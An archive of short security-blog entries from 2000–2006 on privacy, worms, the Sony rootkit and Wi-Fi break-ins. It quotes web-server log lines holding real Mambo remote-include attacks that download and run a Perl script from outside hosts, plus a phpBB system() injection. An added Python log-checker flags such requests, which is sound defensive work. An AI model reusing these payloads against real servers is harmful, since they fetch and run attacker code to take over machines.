Fun story: Peter Cochrane's Blog: Snooping on a BlackBerry fool. Peter Cochrane writes about being on a train and being able to listen in to half of a (loud) pre-sales meeting call, with all details being shouted into the train carriage for everyone to enjoy. A bit of very British humour in it, and a good story about both the annoyance of mobile phones in public places and the privacy/security implications. Found via Bruce Schneier: The Analog Hole / security risks of talking loudly.
2006-02-19 (#)
And 52 hours after my afterthought about mentioning the magic phrase for a web worm, the first attempt: h58737.serverkompetenz.net - - [18/Feb/2006:23:49:09 +0100] "GET /index.php?_REQUEST[option]=com_content& _REQUEST[Itemid]=1& GLOBALS=& mosConfig_absolute_path=http://www.microsofti.li/tool.gif?& cmd=cd%20/tmp/;lwp-download%20http://www.microsofti.li/sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*? HTTP/1.0" 200 3090 "-" "Mozilla/5.0"
2006-02-16 (#)
Finally fetched the source of the Mambo exploit I mentioned before. It does a Google search for "by mambo" and this phrase can be found using Google on The Virtual Bookcase exactly once, in the page about Books by Mambo Ama Mazama. Interesting source to read: a bit of PHP which calls itself Defacing Tool 2.0 by r3v3ng4ns and a bit of Perl which starts an IRC bot on server bsd.cuti.cz which allows the usual stuff like taking over the machine and doing portscans. Afterthought: will this host now also get hit because it contains the magic phrase?
2006-02-14 (#)
On The Virtual Bookcase I get loads and loads of requests looking like (broken up for readability): "GET /book/byauthor/index.php? _REQUEST[option]=com_content& _REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path=http://www.thriftysix.co.uk/tool25.txt ?&cmd=cd%20/tmp/;wget%20http://www.thriftysix.co.uk/logs.txt; perl%20logs.txt;rm%20-rf%20logs.txt*? HTTP/1.0" 404 2348 "-" "Mozilla/5.0". All fail of course (that's how I notice them). It seems this is a Mambo exploit in use. Funny thing is I never use Mambo on any site.
I have tried several times to get that tool25.txt to have a look, but it always returns 'The server is temporarily unable to service your request due to the site owner reaching his/her bandwidth limit. Please try again later.'
2005-12-21 (#)
I wrote a bit about how I configure OpenSSH to make it less susceptible to break-in via password guessing.
2005-12-07 (#)
Doing the rounds, a really great story about a guy stopping a filesharer hogging the wireless network in a hotel. Also makes you think about (lack of) wireless network security and/or certain operating systems more than willing to share information about you.
2005-11-04 (#)
Good article in Wired: The Cover-Up Is the Crime, about the rootkit installed by a Sony audio CD with copy protection. Sony tries to focus on the file hiding bit with making fixes available, but as Wired (and others) write: Sony is breaking into your computer, trespassing. Also a good comment in Freedom to Tinker, and seen in The Register: Removing Sony's CD 'rootkit' kills Windows.
2005-09-20 (#)
Found this article, Finns urge better Wi-Fi security after bank break-in, where a bank computer was broken into via an open Wi-Fi access point (and the original person breaking in traced via the MAC address of his Wi-Fi card). Source: WifiNetNews article.
2005-09-13 (#)
Borrowed a Bol (Dutch on-line bookstore) URL from IRC, and was able to shop in the same session and adjust the content of the shopping cart upwards. Someone else borrowed the same URL and got his name attached to the session. Lousy security for an on-line store...
2005-08-02 (#)
PC-Crash sorgte für Megastau (PC crash caused major traffic jam). A crashed PC in the traffic light control system for the Elbe tunnel in Hamburg, Germany kept 2 (out of 4) tunnels closed for hours, which led to long traffic jams. Running Windows? Probably, the firm delivering the control software is a Windows shop. Found through comp.risks 23.95
2005-05-17 (#)
Mentioning phpBB on my homepage makes for interesting log entries. A Perl worm searching for vulnerable phpBB installs was trying to install an IRC bot talking to eu.undernet.org
2005-05-04 (#)
A new Windows Outlook virus is doing the rounds and I get to enjoy the bounces again (I ranted about this before, and ranted about McAfee specifically again). Brian Martin wrote a nice article/rant about it too. Symantec antivirus has fixed this problem.
2005-03-18 (#)
A teacher asked for a directory on https://wwwsec.cs.uu.nl/ to be limited to a specific client certificate. Configuring this exact limitation took quite some searching, as I couldn't find it in the mod_ssl documentation (the site being down a lot of the time this week didn't help either). The correct way to write that you want to limit to a certain subject DN turns out to be: %{SSL_CLIENT_S_DN} eq "/C=NL/ST=Utrecht/L=Utrecht/O=Universiteit Utrecht/... "
2005-01-03 (#)
The phpBB vulnerability that showed up before even got turned into a worm named the Santy worm (zdnet article), which automatically defaced sites running phpBB. Details of Santy worm at Symantec.
2004-11-25 (#)
Yes, phpBB had a security problem. Again. Because I want something resembling a working webforum on Camp Wireless I now run PHP in safe_mode.
2004-11-23 (#)
Interesting what you can see in a web access log: 201.9.255.250 - - [23/Nov/2004:17:19:28 +0100] "GET /forum/viewtopic.php?t=12&highlight=%2527%252esystem(chr(105)%252echr(100))%252e%2527 HTTP/1.0" 200 15071 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)". Guess phpBB has a problem...
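An added example (not code from this blog): a small Python check that flags access-log requests shaped like the Mambo probes in the 2006 entries and the phpBB request above. The sample lines, the `.example` host and the reason labels are constructed for illustration, and a parameter that legitimately carries a URL would also be flagged.

```python
import re
from urllib.parse import unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SUPERGLOBAL_RE = re.compile(r"^(?:_REQUEST|_GET|_POST|_COOKIE|_SERVER|GLOBALS)(?:\[|$)")
PHP_CALL_RE = re.compile(r"\b(?:system|passthru|exec|shell_exec|eval)\s*\(")
DOWNLOADER_RE = re.compile(r"\b(?:wget|lwp-download|curl)\b")

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable; the phpBB request is encoded twice (%2527 -> %27 -> ')."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(log_line):
    """Return the sorted reasons a logged request resembles the probes quoted on this page."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    _, _, query = match.group(1).partition("?")
    reasons = set()
    for pair in query.split("&"):
        raw_name, _, raw_value = pair.partition("=")
        name, value = fully_decode(raw_name), fully_decode(raw_value)
        if SUPERGLOBAL_RE.match(name):
            reasons.add("superglobal-overwrite")  # _REQUEST[...] / GLOBALS sent as parameters
        if value.lower().startswith(("http://", "https://", "ftp://")):
            reasons.add("remote-include-url")     # e.g. mosConfig_absolute_path=http://...
        if DOWNLOADER_RE.search(value):
            reasons.add("shell-download")         # fetch-and-run chain in cmd=
        if PHP_CALL_RE.search(value):
            reasons.add("php-code-injection")     # e.g. '.system(...).' in highlight=
        if unquote(raw_value) != value:
            reasons.add("multi-encoded")          # needed more than one decoding round
    return sorted(reasons)

# Constructed sample lines modelled on the entries on this page (documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Feb/2006:23:49:09 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://files.example/tool.gif?&cmd=cd%20/tmp/;wget%20http://files.example/x;perl%20x;rm%20-rf%20x*? HTTP/1.0" 404 2348 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [23/Nov/2004:17:19:28 +0100] "GET /forum/viewtopic.php?t=12&highlight=%2527%252esystem(chr(105)%252echr(100))%252e%2527 HTTP/1.0" 200 15071 "-" "Mozilla/4.0"',
    '192.0.2.12 - - [23/Nov/2004:17:20:01 +0100] "GET /forum/viewtopic.php?t=12&highlight=wireless HTTP/1.0" 200 15071 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line) or ["clean"], line.split('"')[1][:60])
```

A hit with status 200, as in the phpBB line, only means the page was served; whether the payload ran has to be checked on the host itself.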
2004-11-15 (#)
Last weekend: the HCC dagen. Played with driftnet at the PCgg stand, with its output going to a video projector. The general impression is that the fair was smaller and less busy than in previous years.
2000-07-21 (#)
Filter ruleset to make sendmail filter out the Outlook date header overflow exploit